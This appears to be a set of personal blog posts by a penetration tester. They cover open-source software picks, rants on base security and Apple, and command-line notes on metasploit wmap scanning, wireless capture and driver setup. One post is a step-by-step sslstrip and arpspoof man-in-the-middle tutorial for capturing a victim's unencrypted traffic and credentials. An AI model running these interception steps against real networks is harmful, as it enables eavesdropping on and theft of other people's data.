Four years ago, give or take, Gartner Technology Group had this to say about open source software and its emerging role in the enterprise:
By 2012, 80 per cent of all commercial software will include elements of open source technology. Many technologies are mature, stable, and well supported. They provide significant opportunities for vendors and users to lower their total cost of ownership and increase returns on investment. Ignoring this will put companies at a serious competitive disadvantage.
I’m willing to go a step further; as of 2012, the typical small to mid-sized enterprise can easily support their mission needs and IT infrastructure entirely with open source software. Most of these open source offerings would be free (as in puppies), although in some cases certain advantages could be gained by paying for an advanced version of the software or elevated support options.
In addition, many of these open source offerings represent best-of-breed solutions and in at least a couple of instances (snort and apache, for instance) are, in my opinion, the de facto standard.
The list of software that is presented below represents my recommendations for enterprise-level open source solutions. I have absolutely no doubt that others will have differing opinions. There are plenty of alternatives out there and this is just a single point of view, so no weird responses or flame wars, kids.
oh… and I’m sure I’ve missed something along the way, so I reserve the right to update/edit this as we move forward.
~me
- VIRTUALIZATION
Xen (http://xen.org/ (http://xen NULL.org/))
VirtualBox (www.virtualbox.org)
VirtualSquare (http://wiki.virtualsquare.org (http://wiki NULL.virtualsquare NULL.org)) - DISTRIBUTED COMPUTING (Thin Clients/Remote Desktops)
Thinstation (http://www.thinstation.org/ (http://www NULL.thinstation NULL.org/))
FreeNX (http://freenx.berlios.de/ (http://freenx NULL.berlios NULL.de/)) - CLUSTERING
Linux Virtual Server (http://www.linuxvirtualserver.org/ (http://www NULL.linuxvirtualserver NULL.org/))
Beowulf (http://www.beowulf.org/ (http://www NULL.beowulf NULL.org/)) - SYSTEMS INTEGRATION
Chef (http://wiki.opscode.com/display/chef/Home (http://wiki NULL.opscode NULL.com/display/chef/Home)) - IDS/IPS (Intrusion Detection/Prevention System)
Security Onion (http://securityonion.blogspot.com/ (http://securityonion NULL.blogspot NULL.com/))
Snort (http://www.snort.org/ (http://www NULL.snort NULL.org/)) - SNORT GUI
high-level SOC: Snorby (http://snorby.org/ (http://snorby NULL.org/))
low-level tech: Sguil (http://sguil.sourceforge.net (http://sguil NULL.sourceforge NULL.net)) - NAC (Network Access Control)
PacketFence (http://www.packetfence.org/ (http://www NULL.packetfence NULL.org/)) - NAS (Network Attached Storage)
FreeNAS (http://www.freenas.org/ (http://www NULL.freenas NULL.org/)) - BACKUP
Bacula (http://www.bacula.org/ (http://www NULL.bacula NULL.org/)) - PROJECT MANAGEMENT
]project-open[ (http://www.project-open.com/en/solutions/itsm/index.html (http://www NULL.project-open NULL.com/en/solutions/itsm/index NULL.html)) - SIEM (Security Information and Event Management)
OSSIM (http://alienvault.com/community (http://alienvault NULL.com/community)) - SERVER OS
Ubuntu (http://www.ubuntu.com/ (http://www NULL.ubuntu NULL.com/))
CentOS (http://www.centos.org/ (http://www NULL.centos NULL.org/))
RedHat Enterprise Linux (http://www.redhat.com/products/enterprise-linux/ (http://www NULL.redhat NULL.com/products/enterprise-linux/)) - CLIENT WORKSTATION OS
Ubuntu (http://www.ubuntu.com/ (http://www NULL.ubuntu NULL.com/))
Fedora (http://fedoraproject.org (http://fedoraproject NULL.org))
RedHat Enterprise Linux (http://www.redhat.com/products/enterprise-linux/ (http://www NULL.redhat NULL.com/products/enterprise-linux/)) - CONFIGURATION MANAGEMENT (Change Control)
Tripwire (http://sourceforge.net/projects/tripwire/ (http://sourceforge NULL.net/projects/tripwire/))
CFEngine (http://cfengine.com/community (http://cfengine NULL.com/community)) - IA ANALYST WORKSTATION OS
Backtrack (http://www.backtrack-linux.org/ (http://www NULL.backtrack-linux NULL.org/)) - NETWORK TRAFFIC ANALYSIS TOOL
Xplico (http://www.xplico.org/ (http://www NULL.xplico NULL.org/))
Wireshark (http://www.wireshark.org (http://www NULL.wireshark NULL.org))
Splunk (http://www.splunk.com/product (http://www NULL.splunk NULL.com/product)) - FIREWALL
Smoothwall (http://www.smoothwall.org (http://www NULL.smoothwall NULL.org))
Untangle (http://www.untangle.com (http://www NULL.untangle NULL.com)) - WEB SERVER
Apache (http://www.apache.org (http://www NULL.apache NULL.org)) - WEB APPLICATION FIREWALL
ModSecurity (http://www.modsecurity.org/ (http://www NULL.modsecurity NULL.org/)) - ENTERPRISE PRODUCTION SERVER (LDAP, VPN, DNS, File & Print, DHCP, Proxy, Content Filter, Groupware, Mail Server, etc).
clearOS (http://www.clearfoundation.com/Software/overview.html (http://www NULL.clearfoundation NULL.com/Software/overview NULL.html)) - NETWORK HEALTH MONITORING
Nagios XI (http://www.nagios.com/ (http://www NULL.nagios NULL.com/)) - CMDB (Change Management Database & Service Desk Ticketing Systems)
OTRS (http://www.otrs.com/en/products/ (http://www NULL.otrs NULL.com/en/products/))
rt (http://bestpractical.com/rt/ (http://bestpractical NULL.com/rt/))
iTop (http://www.combodo.com/spip.php?page=rubrique&id_rubrique=8 (http://www NULL.combodo NULL.com/spip NULL.php?page=rubrique&id_rubrique=8))
osTicket (http://osticket.com (http://osticket NULL.com)) - HARDWARE INVENTORY/STRESS TESTING
Inquisitor (http://www.inquisitor.ru (http://www NULL.inquisitor NULL.ru)) - MEDIA SERVER
XBMC (http://www.xbmc.org (http://www NULL.xbmc NULL.org))
FireFly (http://www.fireflymediaserver.org/ (http://www NULL.fireflymediaserver NULL.org/)) - MOBILE DEVICE MANAGEMENT AND SYNC
Funambol (https://www.forge.funambol.org (https://www NULL.forge NULL.funambol NULL.org)) - VoIP (Voice over Internet Protocol)
Asterisk (http://www.asterisk.org/ (http://www NULL.asterisk NULL.org/)) - OFFICE SUITE
openoffice.org (http://www.openoffice.org (http://www NULL.openoffice NULL.org))
libreoffice (http://www.libreoffice.org (http://www NULL.libreoffice NULL.org)) - GRAPHICS EDITING
Gimp (http://www.gimp.org (http://www NULL.gimp NULL.org))
Inkscape (http://www.inkscape.org (http://www NULL.inkscape NULL.org))
…and I’m not even going to bother with enumeration of web browsers, email clients, chat programs, blah blah blah…
so, im writing this from an airport lounge. i had to go through a bag search, two ID checks and one of those creepy full-body imaging scans to get here in the first place, now i had to do it again just to get back home. i feel fairly vetted at this point. dirty…but vetted.
im here because i just finished up a pen-test for several vendors who are hoping to do business with the federal government. the exercise was conducted on-site at the local Air Force base, so i was expecting that i would have to go through pretty much more of the same in order to get anywhere near where they are keeping all the alien spacecraft and Jimmy Hoffa’s remains.
not so much, it turns out.
here’s the short of it: i am absolutely appalled.
most of my days are spent hired-out to a civilian branch of the feds. I dont do a ton of work for DoD or any of the other military sectors. It has always been my understanding that any work for the military side would entail heightened security. the scary fact is this; aside from an ID check (which was performed by contractor security staff) to get onto the base in the first place, absolutely nobody ever questioned my presence in the least. not once.
i entered buildings, i wandered halls, i opened doors. i talked to people… i even took pictures. i did all of this without a badge or an escort and i did it within the confines of several structures that deal with some fairly high level research. nobody cared.
the airport gave me more of a run-down than physical access to the heart of a military installation did.
my work for the civilian branch of the government has guards at every entrance of a building, requires key card access to go anywhere. escorts for visitors, cameras in every corner and locked doors to keep you honest.
turns out Hoffa ain’t dead. he’s researching alien technology for the feds.
he says hi, by the way.
~me
Back in the days when Steve Jobs was trying to reinvent Apple as a multimedia company (as opposed to a computer company) he did a very intelligent thing. It was a thing that neither he (nor, by proxy; Apple) really had a history of doing; he released Apple software for a non-Apple platform. I am speaking, of course, of iTunes for Windows.
This proved instrumental in the reinvention of Apple. How could they have ever dominated the music player/cell phone industry without releasing iTunes to the other 95% -ish of home computer users?
(well, the true answer is that they could have done away with ridiculous activation/media management restrictions that they place on their devices… but stick with me on this)
Now, as a linux user (and an iPhone owner), this leaves me in a bit of a quandary. Apple, to date, refuses to develop a version of iTunes for linux. I can only assume that this business decision was made for one of two reasons;
1. Apple decided that the linux demographic was simply too small to bother with. Instead of spending resources attempting to develop an iTunes version for linux, simply let them fend for themselves.
or…
2. Apple decided that instead of developing iTunes for linux, they should instead force linux-based iDevice users to migrate to an Apple product (or perhaps iTunes for Windows) in order to activate/manage their iDevices.
If reason #1 were the issue, I would completely understand. No problem. After all, the linux community is comprised of an overwhelming majority of geeks (ok, let’s say “power users“) who can fend for themselves just fine. However, time has proven that it is indeed reason #2. Allow me to explain;
It truly did not take long at all for the linux community to reverse-engineer the iDevice requirements and develop support for these devices into linux-based media management software (i.e. Rhythmbox, Amarok or Banshee as an example… all similar to iTunes in scope). Therefore, the problem was solved. We could now transfer our music, movies, podcasts, what-have-you to our iDevices and everybody wins.
Apple immediately built an “update” to their iDevices which crippled the linux functionality.
Let’s be clear; crippling linux functionality wasn’t a “side-effect” of the update, it was the express intent of the update.
And so it began. Apple releases the update which breaks iDevice support in linux, the linux community then takes a month or so to determine the nature of the change and updates their software to accommodate. Apple retaliates with another update… ad nauseam.
Is Steve Jobs so arrogant as to believe that any significant portion of linux users will abandon their operating system simply in order to maintain functionality of their pod/phone/tablet? Apparently so.
This clearly cannot be an instance of “simply ignoring the linux community”, Apple is spending significant resources to actively wage war on us.
Apple enjoys a devout following. It’s users are religiously devoted to the “cult of personality” which envelops everything that they make. I get that, I really do. I happen to like the products that Apple puts out. However, this attitude is nothing in the face of the jihadist attitude saturating the open-source community (and linux in specific).
I have a prodigious media collection. So large, in fact, that iTunes could not deal with it even if I were so inclined (trust me, I’ve tried). I also spend nearly three hours each work-day on the road. Obviously, aside from communicating, the main purpose of my iPhone is for music playback.
At this point, I have once again lost the ability to manage my media via my linux-based mediacenter. With the rise of the Android OS as a major player in the market, I am simply in awe of the sheer stupidity being displayed by Apple.
I’ll make the switch, Apple. But I don’t think it is the switch that you were hoping for.
As a side-note, the HTC Sensation (http://www NULL.knowyourmobile NULL.com/comparisons/855860/htc_sensation_vs_apple_iphone_4 NULL.html) is looking really sexy. You should check it out, Steve… I know I will.
~me
Ok, let’s rant about one of my pet-peeves (and boy isn’t that a list):
Ever go to one of those websites that uses SSL encryption and boldly states something like;
“We use SSL encryption to protect your data. This site is certified as absolutely secure! We DARE anyone to try to steal your information, you can feel perfectly safe telling us all your dirty little secrets”.
So, you go ahead and throw in your credit card numbers, banking information, girlfriend’s hat size, whatever. After all, they said it was safe, right?
Ok, let’s not even bring up the dozens of ways that SSL doesn’t cover you (XSS, SQL injection, etc…), let’s just focus on how easy it is to circumnavigate it in the first damn place. Ready? Ok, here we go:
First of all, let’s make sure we have a nice little attack platform set up. I’ll use BackTrack 4R2, you use whatever you like.
Next, let’s make sure we have a nice little tool known as “sslstrip” installed (i do, i’ll wait here if you need to go get it).
sslstrip is basically used to set up a MITM (man-in-the-middle) attack. It intercepts your data, takes what it wants and then forwards it on down the line. Classic arp-spoof attack at it’s simplest.
First, we need to make sure that our system will actually forward the data that it receives from the victim. To enable port forwarding, I’ll enter the following command:
# echo 1 > /proc/sys/net/ipv4/ip_forward
The next thing I’ll do is tell my system to forward any TCP packets that it gets from port 80 (the victim’s web browsing) to another port so that sslstrip can monitor, record and send it on down the line without interfering with whatever else I’m doing in the meantime:
# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 12345
The port that you forward the traffic to is fairly irrelevant, just make sure that you aren’t stepping all over existing traffic.
Ok, so let’s convince our target that we are their gateway to the world. Just like St. Louis. Wait, that’s the gateway to the west. Sorry. Anyway, you obviously need to know two things; the IP address of your target and the IP address of their gateway. Once you have that, the command you want is this (oh, yeh… did i mention you needed arpspoof?):
# arpspoof -i interface -t target_ip gateway_ip
Lastly, let’s start up sslstrip and tell it to write (-w) what it sees to a log file. My log files take the form of “target_date_time_tool” with the time being in UTC. So, for me the command would look something like this:
# sslstrip -w ~/forensics/engagement/target_yyyy_mm_dd_2400UTC_sslstrip
…and we go read a book. Depending on the traffic generated, we may even have time to go write a book.
If everything goes well, we convince the target that to get anywhere at all they have to go through us. We then log all their information and forward it to wherever they were trying to go. The important difference is that what the target sends us is unencrypted. Let this cook for a while and then check the log file for goodies…
Happy hunting!
~me
Couldn’t really find one place on the web that detailed the use of the wmap plugin for metasploit correctly. I’ve pieced together the instructions below for running metasploit/wmap on backtrack 4r2.
—————
ok, so first let’s install a couple of dependencies:
# apt-get install libxml-ruby libxslt-ruby libxslt-dev
# gem install anemone
# gem install nokogiri
right then. let’s start our mysql server (or postgre, whatever you like):
# service mysql start
and now let’s move into metasploit:
# cd /opt/metasploit3/msf3/
# ./msfupdate
# ./msfconsole
metasploit defaults to postgre as it’s db_driver, so let’s change that and then create a database to use with wmap (you can call yours whatever you want):
msf> db_driver mysql
msf> db_connect root:toor@127.0.0.1/wmap
…that last bit assumes you haven’t changed the default mysql password.
ok, let’s load wmap and our http crawler:
msf> load wmap
msf> use scanner/http/crawler
you can show options to see what you need, but all we really need to do is set the “RHOST” variable:
msf> set RHOST www.website.com
and let’s make some magic:
msf> run
ok, so this will add our website of choice into the wmap database. you can verify by listing the sites:
msf> wmap_sites -l
assuming you see what you expected to (and you don’t want to add any more sites to the db for now), let’s load this site as a target (by URL and IP):
msf> wmap_targets -t www.website.com,11.22.33.44
at this point, we have options for viewing the modules that will be run against our target (wmap_run -t), changing advanced settings (setg), etc… but let’s just run wmap against our target:
msf> wmap_run -e
when it’s time to review the findings, you’ll want:
msf> db_vulns
and
msf> db_notes
…hrm. now what to do with it?
finally got around to jailbreaking my iphone 3gs running ios 4.2.1
installed apt, openssh as well as a terminal application through cydia.
ssh’d into localhost, su’d and changed my root password immediately (default password is ‘alpine’).
installed metasploit by the following steps:
# apt-get install subversion nano wget python
# apt-get clean
# wget http://www.metasploit.com/releases/framework-3.4.1.tar.bz2
# tar jxpf framework-3.4.1.tar.bz2
# rm ./framework-3.4.1.tar.bz2
# cd msf3
# svn update
# cd ..
i would have installed ruby and rubygems via apt as well, but the version in the cydia repos right now breaks metasploit.
so instead:
# wget http://apt.saurik.com/dists/tangelo_0.9/main/binary-iphoneos-arm/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb
# dpkg -i ./ruby_1.8.6-p111-5_iphoneos-arm.deb
# wget http://apt.saurik.com/dists/tangelo_0.9/main/binary-iphoneos-arm/debs/rubygems_1.2.0-3_iphoneos-arm.deb
# dpkg -i ./rubygems_1.2.0-3_iphoneos-arm.deb
# rm ./ruby*
…and the rest, as they say, was history:
having a dedicated pentest system is extremely convenient, if not essential. i use a modified backtrack 4r2 system (greybox), installed locally and using flux as its window manager. boot disks have their place, but i also like to know that my work has a persistent home.
one pain, however, is that locking the screen is a bit of a chore. the largest hurdle; xscreensaver simply refuses to function under root logon. i could create non-root users, which in most other cases would be best anyway, but in this instance it creates a series of other issues i’d rather not deal with.
here’s a few quick steps that will get an auto-locking screen using root login and fluxbox. this isn’t the only solution, but certainly simple and effective.
first, let’s install two packages:
# apt-get install xautolock xlockmore
…and now, let’s open up the fluxbox startup script:
# pico ~/.fluxbox/startup
…and let’s add a couple of lines (make sure they are above ‘exec fluxbox’):
# autolocks X screen after 15 minutes of inactivity
xautolock –time 15 –locker “xlock –mode blank” –secure &
that’s it. no mess or fuss. save and exit. go ahead and manually run the xautolock command as it is listed above to start it now (or just restart fluxbox).
# airmon-ng
–determines applicable interfaces
# airmon-ng stop interface
# airmon-ng start interface
–this puts the interface into monitor mode via an interface alias (most likely mon0)
# airodump-ng -w /path/to/file/target_yyyy_mm_dd_2400UTC_tool –output-format pcap,csv InterfaceAlias
–this starts the airodump-ng scan,displays results and writes our files.
** ‘s‘ changes sorting options, for instance; by power-level ( ‘d‘ resets defaults)
** ‘r‘ (de) activates real-time sorting
** ‘SPACE‘ pauses display
** ‘TAB‘ (de) activates scrolling selections
** ‘m‘ highlights selection (and associated stations) in one of several color choices
** ‘CTL+Z‘ to close airodump-ng
if you need to do a quick conversion to UTC, try this:
# date –utc
i had hoped that getting the awus036nh to work in BT4R1 was going to be a relatively simple
issue…
i made sure that the system was updated and upgraded via apt, then;
# apt-get install firmware-ralink
# cd /usr/src/drivers/compat-wireless-2010-07-10
# ./scripts/driver-select rt2×00
# make
# make install
# make unload
# modprobe rt2800usb
there was a misconfiguration issue of the AP and interface (mon0) being reported as on different channels via aireplay-ng. i downloaded patch (http://www NULL.backtrack-linux NULL.org/forums/backtrack-howtos/31264-howto-alfa-802-11a-b-g-n-awus050nh-rt2800usb-backtrack-4-r1-2 NULL.html) and compiled:
# cp chan.patch /usr/src/drivers/compat-wireless-2010-07-10/net/wireless/
# cd /usr/src/drivers/compat-wireless-2010-07-10/net/wireless
# patch -p0 < chan.patch
unfortunately, not so easy.
problem 1: while the alfa did work, it was constantly dropping the connection.
problem 2: the internal bcm43xxx stopped seeing anything at all.
i tried several solutions (including the re-install of b43-fwcutter) but no love, really.
luckily, BT4R2 came out so i did a rip/replace upgrade and apparently everything is working right out of the box…
still dropping signal way too much, but we’ll see what we can do about that.
amen to muts, et. al.
~me
yeh, that’s macphail tartan. the blue is the ‘hunting tartan’ and the red is the ‘dress
tartan’ while we are on the subject, here’s the clan chieftain’s badge as well
(although i admit to the text “improvement”)…
